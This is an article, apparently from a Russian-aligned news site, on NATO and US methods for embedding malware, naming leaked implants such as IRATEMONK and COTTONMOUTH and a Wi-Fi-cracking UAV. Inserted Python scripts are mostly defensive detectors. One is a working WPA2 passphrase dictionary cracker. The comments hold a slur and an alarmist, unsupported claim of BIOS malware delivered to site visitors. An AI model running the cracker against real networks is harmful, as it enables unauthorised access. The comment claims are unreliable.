An Overview of NATO Efforts To Remotely Embed Malware

Today one of the highest-priority dimensions of building cyber-operations capability is the creation of dedicated hardware and software tools, and of the information technologies behind them, for intelligence gathering and offensive operations. This involves active development of so-called information weapons, a category that covers the whole range of means for attacking an adversary's information resources. Such attacks mainly target computer and telecommunications systems: software, databases, computing and data-processing facilities, and communications networks.

Of particular importance is the development of dedicated offensive technologies that can be applied covertly against command-and-control infrastructure in order to disrupt the orderly functioning of its key components and to seize control over them.

Intelligence-gathering cyber tools are intended to collect information about the adversary, including the structure, functioning, and vulnerabilities of its command systems. To achieve that, malware is planted on automated workstations in order to establish a distributed, remotely controlled intelligence-gathering network, which may include thousands of computers in government and military facilities in various countries.

The term malware covers externally or internally introduced program code possessing various destructive functions, such as:

  • destroying or altering software, or destroying or corrupting data, once a certain condition is met (“logic bombs”);
  • exceeding the user’s authority in order to copy confidential information, or to make such copying possible (“trojan horses”);
  • disabling protection systems or making it possible to bypass them;
  • intercepting user login credentials through phishing or keystroke logging;
  • intercepting data flowing within a distributed system (monitors, sniffers);
  • concealing its own presence;
  • self-replication: attaching itself to other software and/or embedding its own fragments into areas of working or external memory that were not its original target;
  • destroying or corrupting program code in working memory;
  • corrupting, blocking, or substituting data created by applications and written to data links or external memory.

Overall, there are three main types of destructive function that malware may perform:

  • capturing or collecting fragments of data created by the user or by applications, or passing through uploads and downloads, from external memory (local or remote) on a networked or stand-alone computer, including passwords, keys, and other access credentials and confidential documents in electronic form; or simply corrupting fragments of sensitive data;
  • changing application algorithms (by deliberately acting on external or working memory) so as to alter the basic logic of their operation;
  • imposing a particular mode of operation, or substituting the data being recorded with data produced by the malware.

Overall, the use of malware presupposes an internal distribution mechanism that spreads it across global or local networks, including the internet, to carry out specific tasks. These may include:

  • penetrating remote computers to seize complete or partial control of them;
  • launching copies of the malware on the infected computer;
  • further penetration of every reachable network.

Such malware is mainly distributed as files attached to e-mails and instant messages, and also through specially placed hyperlinks. This type of attack is distinguished by its scale and high speed of infection. The number of internet sites engaged in spreading malware doubles every year. These sites attract users by posting current informational content: news, analysis, overviews of information technology, and also commercial and entertainment articles. More than 20% of such sites are set up specifically for malware distribution.
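The two delivery vectors just described, executable attachments and deceptive hyperlinks, are what a mail-gateway triage step looks for. The script below is an added example written for this page, not code from the article or from any product it mentions: it walks the MIME parts of a message, flags executable and archive attachments and “invoice.pdf.exe”-style double extensions, and flags anchors whose visible text looks like a URL on a different host than the real href. The extension lists are assumptions to be tuned per environment, and the sample message is constructed.

```python
"""Triage an e-mail for the delivery vectors above: executable attachments,
double extensions and hyperlinks whose visible text hides the real target.
Added example, not code from the article; the message below is constructed."""
import email
import re
from email import policy
from html.parser import HTMLParser

# Assumed lists; tune to your environment.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs",
                   "wsf", "hta", "lnk", "msi", "ps1", "docm", "xlsm", "pptm"}
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}


def classify_attachment(filename):
    """Findings for one attachment name (empty list when nothing is suspicious)."""
    findings = []
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return findings
    ext = parts[-1]
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable attachment: {filename}")
    if ext in ARCHIVE_EXTS:
        findings.append(f"archive attachment (may wrap an executable): {filename}")
    # "invoice.pdf.exe": a document extension shown, an executable one hidden behind it
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS and ext in EXECUTABLE_EXTS:
        findings.append(f"double extension: {filename}")
    return findings


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    m = re.match(r"(?:https?://)?([^/\s:]+)", url.strip(), re.I)
    return m.group(1).lower() if m else ""


def classify_links(html):
    """Flag anchors whose visible text looks like a URL on a different host than the href."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        if re.match(r"(?:https?://)?[\w.-]+\.[a-z]{2,}", text, re.I) and _host(text) != _host(href):
            findings.append(f"link text {text!r} actually points at {href}")
    return findings


def triage(raw_message):
    """Walk every MIME part of a raw RFC 822 message and return all findings."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            findings.extend(classify_attachment(filename))
        elif part.get_content_type() == "text/html":
            findings.extend(classify_links(part.get_content()))
    return findings


# Constructed sample: a lure with a spoofed link and a double-extension attachment.
SAMPLE = """\
From: it-support@example.com
To: user@example.com
Subject: Urgent: updated VPN profile
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>Please install the update: <a href="http://198.51.100.7/vpn">https://vpn.example.com/update</a></p>
--b1
Content-Type: application/octet-stream; name="vpn_profile.pdf.exe"
Content-Disposition: attachment; filename="vpn_profile.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--b1--
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The host comparison is deliberately strict: a link whose text names one domain and whose href points at a bare IP or another domain is the classic phishing tell, and it is cheap to check before any content inspection. Archives are only flagged, not opened; unpacking them belongs in a sandboxed stage.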

Other ways of using malware include:

  • distributed denial-of-service (DDoS) attacks, which generate intense traffic of bogus requests so that legitimate users can no longer reach the network or its servers;
  • dissemination of malware through USB memory devices, the most efficient means of doing so;
  • embedding and activating implants (code inserts).

At the same time, many NATO countries have established military units for cyber operations; they are also building the scientific and technical infrastructure to develop dedicated information technologies for offensive use, including self-replicating and self-propagating malware, and drafting doctrines for their employment.

There is, moreover, so-called fileless (packet) malware, which is delivered in network packets and enters computers through vulnerabilities in the operating system or security holes in applications, without ever being written to disk as a file.

To embed malware remotely, an attacker may use social engineering or weaknesses in the administration of the organization’s network, such as unprotected local disks.

The most widespread channel for embedding malware is the internet. Offensive malware targets both individual computers and whole networks. It gains entry through known and newly discovered weaknesses in software and hardware developed by the potential adversary, but also in devices and programs from the world’s leading IT firms, most of which are based in the US.

Other means of embedding malware are human agents, remote technical means (including the peripheral devices of the system under attack), combined attacks, and so on. Malware developers concentrate on the ability to maintain a stealthy presence among the target’s software and to remain in place even after an upgrade or reinstallation.

The main methods of covertly embedding malware are:

  • Masquerading as ordinary software. Here the malware is introduced through the installation of a new application. It may be hidden in graphics or text editors, system utilities, screensavers, etc. Its presence is not concealed after installation;
  • Masquerading as a module that extends the computing environment. A frequent variation of the previous method, it exploits the mechanisms by which environments are extended. On Microsoft Windows, for example, such modules include DLLs and drivers, either of which may carry malware;
  • Replacing one or several application modules of the attacked environment. One or more modules are chosen and replaced with infected ones that carry out the intended tasks. Such malware must outwardly perform the normal functions of the software it replaces;
  • Direct attachment. The malware is attached to the executable files of one or several legitimate programs on the system. This is the simplest method on single-task, single-user systems;
  • Indirect attachment. The malware attaches itself to the code of a software module already loaded into working memory. The executable file on disk remains unchanged, which makes detection harder. This requires that the installing part of the malware already be present on the system.
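Three of the five methods above (module replacement, direct attachment, and a planted “extension” DLL) leave a trace on disk, and the standard check for them is a signed baseline manifest compared against the software tree. The following is an added example written for this page, not code from the article: it builds a SHA-256 manifest of a directory, then reports files whose hash changed (with the size delta, which for an appending file infector is the payload size) and new loadable modules that were not in the baseline. The directory, file names and contents are constructed in a temporary folder so the script runs offline.

```python
"""Detect on-disk embedding (module replacement, direct attachment, planted DLLs)
by comparing a software tree against a baseline manifest.  Added example, not
from the article; the files below are constructed stand-ins for real binaries."""
import hashlib
import json
import os
import tempfile

# Assumed: extensions the loader will execute, so a new one is worth a finding.
LOADABLE = (".exe", ".dll", ".sys", ".so", ".ocx")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (POSIX-style relative path) to its hash and size."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return manifest


def verify(root, manifest):
    """Findings: ("missing", path), ("modified", path, size_delta), ("new-module", path)."""
    current = build_manifest(root)
    findings = []
    for rel, rec in manifest.items():
        if rel not in current:
            findings.append(("missing", rel))
        elif current[rel]["sha256"] != rec["sha256"]:
            findings.append(("modified", rel, current[rel]["size"] - rec["size"]))
    for rel in current:
        if rel not in manifest and rel.lower().endswith(LOADABLE):
            findings.append(("new-module", rel))
    return findings


def demo():
    """Baseline a constructed app directory, then simulate two of the methods above."""
    with tempfile.TemporaryDirectory() as root:
        app = os.path.join(root, "app")
        os.makedirs(app)
        with open(os.path.join(app, "editor.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 4094)           # stand-in for a 4 KiB binary
        with open(os.path.join(app, "render.dll"), "wb") as f:
            f.write(b"MZ" + b"\x01" * 2046)
        baseline_json = json.dumps(build_manifest(app))  # store this off-host, signed

        with open(os.path.join(app, "editor.exe"), "ab") as f:   # direct attachment
            f.write(b"\xcc" * 512)                               # 512-byte appended payload
        with open(os.path.join(app, "version.dll"), "wb") as f:  # planted search-order DLL
            f.write(b"MZ" + b"\x02" * 100)

        return sorted(verify(app, json.loads(baseline_json)))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Two caveats a practitioner would add. The manifest must be kept where the implant cannot rewrite it (off-host, or signed with a key the host does not hold), otherwise a replacement module simply arrives with an updated manifest. And the fifth method, indirect attachment in memory, is invisible to this check by design: for that you compare the loaded image against the on-disk file, which means trusting the host’s own view of memory.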

The most potentially useful means of embedding malware in order to gain covert access to enemy networks, other than through global networks, are the following hardware and firmware implants:

IRATEMONK embeds malware for surveillance of desktop and laptop computers by implanting the hard drive’s firmware, which lets it gain execution by substituting the Master Boot Record (MBR). It works with hard drives from Western Digital, Seagate, Maxtor, and Samsung, and supports the FAT, NTFS, EXT3, and UFS file systems, but not RAID configurations. Once installed, IRATEMONK launches its payload every time the target computer is switched on.
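MBR substitution is the one part of the IRATEMONK description that leaves a checkable artefact: the first 512 bytes of the disk. The block below is an added example for this page, not the implant’s code or anything from the article. It parses an MBR (boot signature, disk signature, the four 16-byte partition entries) and compares the 440-byte bootstrap area against a hash taken from a trusted image; the “implanted” sector keeps the partition table and disk signature intact, as a loader that still has to boot the OS would. Both sectors are constructed, and the bootstrap bytes are stand-ins, not real loader code.

```python
"""Parse a 512-byte Master Boot Record and check its bootstrap code against a
known-good hash, the on-disk artefact that MBR-substitution persistence must
change.  Added example, not from the article; both sectors below are constructed."""
import hashlib
import struct

# One partition entry: boot flag, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
PART_ENTRY = "<B3xB3xII"


def parse_mbr(sector):
    """Return bootstrap-code hash, disk signature and the non-empty partition entries."""
    if len(sector) != 512:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = 446 + 16 * i
        boot_flag, ptype, lba_start, sectors = struct.unpack(PART_ENTRY, sector[off:off + 16])
        if ptype != 0:
            partitions.append({"index": i, "bootable": boot_flag == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        # bytes 0-439 are code; 440-443 hold the disk signature, 444-445 are reserved
        "bootcode_sha256": hashlib.sha256(sector[:440]).hexdigest(),
        "disk_signature": struct.unpack("<I", sector[440:444])[0],
        "partitions": partitions,
    }


def check_bootcode(sector, known_good_sha256):
    """True when the bootstrap code matches the baseline taken from a trusted image."""
    return parse_mbr(sector)["bootcode_sha256"] == known_good_sha256


def make_mbr(bootcode, disk_signature, entries):
    """Assemble a constructed MBR; entries are (bootable, type, lba_start, sectors)."""
    sector = bytearray(512)
    sector[:len(bootcode)] = bootcode
    struct.pack_into("<I", sector, 440, disk_signature)
    for i, (bootable, ptype, lba, count) in enumerate(entries):
        struct.pack_into(PART_ENTRY, sector, 446 + 16 * i, 0x80 if bootable else 0, ptype, lba, count)
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)


PARTITIONS = [(True, 0x07, 2048, 1_000_000), (False, 0x83, 1_002_048, 500_000)]
CLEAN_BOOTCODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 433   # stand-in loader code
CLEAN = make_mbr(CLEAN_BOOTCODE, 0xDEADBEEF, PARTITIONS)
BASELINE = hashlib.sha256(CLEAN_BOOTCODE).hexdigest()           # recorded from a trusted image
# Implant scenario: the bootstrap is swapped for a stub that chains to hidden sectors,
# while the partition table and disk signature are copied over so the OS still boots.
IMPLANTED = make_mbr(b"\xeb\x3c\x90" + b"\x00" * 437, 0xDEADBEEF, PARTITIONS)

if __name__ == "__main__":
    for name, sector in (("clean", CLEAN), ("implanted", IMPLANTED)):
        info = parse_mbr(sector)
        print(name, "bootcode ok:", check_bootcode(sector, BASELINE),
              "partitions:", [(p["type"], p["lba_start"]) for p in info["partitions"]])
```

The caveat matters more than the code: the implant described here lives in the drive’s firmware, so a read of sector 0 issued through that same firmware can be answered with the original bytes while the substituted ones are served only at boot. A clean result from the running host is therefore not conclusive; the check is worth running from trusted boot media against a disk image, and a persistent mismatch between what the BIOS executed and what the OS reads is itself the indicator.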

SWAP embeds espionage malware by exploiting the motherboard BIOS and the Host Protected Area (HPA) of the hard drive so as to run its code before the operating system loads. It provides remote access to various operating systems (Windows, FreeBSD, Linux, Solaris) on various file systems (FAT32, NTFS, EXT2, EXT3, UFS 1.0). Two utilities are used for installation: ARKSTREAM, which reflashes the BIOS, and TWISTEDKILT, which writes the SWAP loader and the malware payload to the HPA of the hard drive.

COTTONMOUTH is a USB hardware implant that provides a wireless bridge into the target network and can load exploits onto the target system. It can open a covert channel for sending commands and exfiltrating data. A built-in radio lets it communicate with other COTTONMOUTH devices. It is built on the TRINITY component base, with HOWLERMONKEY as its transceiver. A variant called MOCCASIN is permanently built into a USB keyboard.

FIREWALK is a network implant that passively collects Gigabit Ethernet traffic and actively injects Ethernet packets into the target network. It can create a VPN tunnel between the targeted network and the operators’ center, and can communicate wirelessly with other HOWLERMONKEY-compatible devices. Its construction is similar to COTTONMOUTH: it uses the TRINITY component base and HOWLERMONKEY as its transceiver.

NIGHTSTAND is a mobile system for active attacks on Wi-Fi networks, used to deliver exploits and payloads to Windows machines when direct access is not possible. It is built around a Linux notebook with radio equipment; external amplifiers and antennas give it a range of up to 13 km.

DEITYBOUNCE provides persistent software access to Dell PowerEdge servers via the motherboard BIOS and System Management Mode (SMM), gaining execution before the operating system starts. Once set up, it runs every time the system is switched on.

FEEDTROUGH is a persistence mechanism for installing two implants, BANANAGLEE and ZESTYLEAK, used to defeat network firewalls (Juniper Netscreen devices). It runs when the firewall boots: if the firewall’s operating system version is present in its database, the implants are installed; otherwise the system boots normally. FEEDTROUGH survives updates of the firewall’s operating system.

CTX4000 is a portable continuous-wave radar unit. It illuminates implants installed in target systems in order to retrieve data from them.

NIGHTWATCH is a PC-based system for processing and reconstructing the video signal of a targeted monitor. The signal may come from a data collection system (implants in the monitor cable) or from a general-purpose receiver.

HOWLERMONKEY is a short- to medium-range radio transceiver, a dedicated radio module used by other implants to exfiltrate collected data and to provide remote access to them.

There are also other methods of embedding malware: through transceivers built into USB cables or devices, and through Wi-Fi, Bluetooth, or GSM devices and cables attached to the targeted computer.

One promising method of remote malware placement is the unmanned aerial vehicle (UAV). USAF specialists have developed the WASP (Wireless Aerial Surveillance Platform) UAV on the basis of the FMQ-117B aerial target. Its main mission is reconnaissance cyber operations. With its onboard equipment it can break into detected Wi-Fi networks and intercept cell-phone conversations. The WASP carries an HD camera, 11 antennas for various radio links, a GPS receiver, and an onboard computer running Linux. Its storage holds an arsenal of tools for breaking into wireless networks and a 340,000-word dictionary for brute-force attacks. Captured data and intercepted conversations are recorded on the onboard computer (a 500 GB solid-state drive) and may also be sent over the internet to a dedicated server via 3G and 4G networks or through compromised Wi-Fi hotspots.

GPS allows the UAV to fly an assigned route autonomously, but an operator is needed for take-off and landing. Each system costs about $6,000, not counting the UAV itself.
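What the WASP’s word list is for is worth spelling out, because it shows both why the attack works and what stops it. Against WPA2-PSK an attacker needs only a captured 4-way handshake; each candidate passphrase is stretched with PBKDF2 into a PMK, the PTK is derived from the two MAC addresses and nonces, and the first 16 bytes of it (the KCK) are used to recompute the MIC on an EAPOL-Key frame. A match means the guess was right. The block below is an added example for this page, not the platform’s code: the SSID, MAC addresses, nonces, frame bytes and passphrase are all constructed so the handshake can be generated and then cracked offline, and the WPA2 (descriptor version 2) HMAC-SHA1 MIC is assumed rather than the WPA/TKIP HMAC-MD5 variant.

```python
"""Dictionary recovery of a WPA2-PSK passphrase from a captured 4-way handshake,
the kind of attack a UAV's word list serves.  Added example, not the platform's
own code.  The handshake below is constructed with a known passphrase so the
script runs offline; MAC addresses, nonces and frame bytes are made up."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """Derive the PTK with the 802.11i PRF and return its first 16 bytes, the
    Key Confirmation Key that keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(3):                      # 3 x 20 bytes covers the 48-byte CCMP PTK
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48][:16]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame with its
    MIC field zeroed, truncated to 16 bytes.  (WPA/TKIP, version 1, uses HMAC-MD5.)"""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        kck = ptk_kck(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return word
    return None


# ---- constructed handshake (not a real capture) ----
SSID = "corp-guest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2: 802.1X header, descriptor type, key info, key length, replay
# counter, SNonce, then key IV / RSC / ID, the zeroed 16-byte MIC and key-data length.
EAPOL_M2_ZEROED = (bytes.fromhex("0103007502010a00000000000000000001")
                   + SNONCE + bytes(16 + 8 + 8) + bytes(16) + b"\x00\x00")
TRUE_PASSPHRASE = "summer2019"           # the weak passphrase the constructed network uses
CAPTURED_MIC = eapol_mic(
    ptk_kck(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    EAPOL_M2_ZEROED)
WORDLIST = ["password", "letmein", "corpguest", "summer2019", "Winter2020!"]


def demo():
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZEROED, CAPTURED_MIC, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs 4096 HMAC-SHA1 iterations, so the attack is bounded by the word list, not by the radio: a passphrase that is long and not in any list is never recovered this way, and because PBKDF2 is salted with the SSID, precomputed tables only help against default or common network names. WPA3-SAE and 802.1X (enterprise) authentication remove the offline-guessable handshake altogether.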

Similar work is under way at US Army Cyber Command with the aim of interfering with automated command posts at the tactical and operational levels. The Sun Eagle tactical reconnaissance UAV is being used to test equipment for remote malware insertion into Wi-Fi and LTE wireless networks.

Overall, the United States and NATO are developing a variety of methods and means for remote malware insertion, spanning different physical media for data processing and transmission and different environments for propagation. Countering such cyber weapons is a difficult and complex task that demands considerable research effort and financial outlay.




Bobby Twoshoes

This would be the perfect article for that tranny who keeps spamming dodgy links to check out her “nude pics”.

Tommy Jensen

Ohh dear ohh dear. What have you against trannies little boy.

Bobby Twoshoes

Certainly not any part of my body. In all fairness though I did call it her.

AM Hants

Vault 7 and CrowdStrike, supported by Google, come to mind.

Hope Russia stays well ahead of it.


I am a senior systems analyst, and for the past few years I have been having an issue but finally tracked it down. It doesn’t need to be an attachment. What appears to be a DoS attack followed by a failed port scan was not failed, but very successful. As a matter of FACT it is automated to attack everyone who logs into SouthFront. A California IP with more than 15 million complaints online and 17K complaints to the FBI has been doing this for years. It uses the Windows Update protocol to modify your BIOS, installs a new user and grants it permission to read and execute, and removes all other permissions. System, virus detection, even the so-called TrustedInstaller cannot see it. All one can do is copy the security token of a running job, run a batch job … and can only view its files. Reinstalling the BIOS fails, either because the virus hides in a driver or because it does not allow proper reinstallation. The computer also will never properly restart, always resuming even after a simulated crash! All information from the hard drive, video, audio, and nearby devices hacked through Bluetooth is encrypted and sent to another IP in California. I have copies of the old and newer versions if someone wants to help out.

Karen Bartlett

This means all of us who have ever watched SF are now on a government list for malware and/or surveillance?

Tommy Jensen

Just stay criminal. They will not touch you.
“Capitalization by destruction” is one of the Bankers’ profit schemes in collusion with Liberals.

Recall these divorce waves?
A divorce means the sale of 1 house and the purchase of 2 new houses. The children get into trouble.
The Bankers earn on money exchange, new loans, more debt; the lawyers earn on court cases and legal papers; the liberals earn office jobs in social welfare and social problem handling. All pure destructive hot-air activity.
Capitalization by destruction.

Same with these MIC concepts. Capitalization by destruction. Bankers, Lawyers and Liberals live as pure parasites on anyone who produces a physical item.

Anthony Papagallo

They dont need to spy on me.
If the U.S gov wants to know what porn sites I like to view they only have to ask me.

T M Bacon

It sounds like the internet is going to become a great pea soup of malware corruption that will slow every device that links to it down to a crawl. One can only hope that all this comes back to bite these bloody vandals on their cybernetic bums.

chris chuba

Russia, China, and Iran are going to buy US-designed / US-sourced electronics, network equipment, operating systems and PCs because … they have a death wish? I know that they are stuck now, but with Russian SW, Chinese SW and manufacturing, and Linux OS this cannot last forever.

Ivan Freely

It’s only a matter of time now for others such as China and Russia to develop their own computing systems. Stupid fools. The Americans effectively killed their computing future in the massive emerging markets.

Karen Bartlett

Welp, on my way to read another SF article…

Emmanuel Goldstein

Ironically, the Disqus scripts on this comment section trigger a clickjacking warning.

Decent primer article, but the main threat at the nation-state/military level is from physical access. That’s true down to the home consumer level as well. Stuxnet is one example; as advanced as it was, it still required an “inside man” to deliver it to the SCADA system in person, as the network was more or less “air-gapped” from any other extranet.

Even less sophisticated malware and ransomware requires a heavy dose of interaction with an end user through clicking on links and fake alert messages, etc. Proper IDS/IPS and permission set-up (i.e. don’t let non-admins run as root, and even admins stick to a non-root account unless doing maintenance) will detect or block most attacks.

There’s a joke in IT where problems are given the code PICNIC. It stands for “problem in chair, not in computer”. Most attacks are from uneducated users, so they’re, for better or worse, the last line of defense.

Ivan Freely

Never heard of PICNIC but have heard and used PEBCAK. Same thing.

Tommy Jensen

Which adversary or enemy, if I may ask???
NATO and the Pentagon are fighting ghosts. Pouring $1 trillion down the drain every year on fantasy fights, and those who are involuntary targets have to spend equally as much to defend themselves against hot-air organisations.

Luke Hemmming

That means some NATO or US cyber centre employee is fapping over my porn collection!! Hope you are enjoying my collection of John Holmes and James Deen vids bwahahaha


So will this work better than the covid malware? Otherwise we can see European cars driving off the cliff soon after..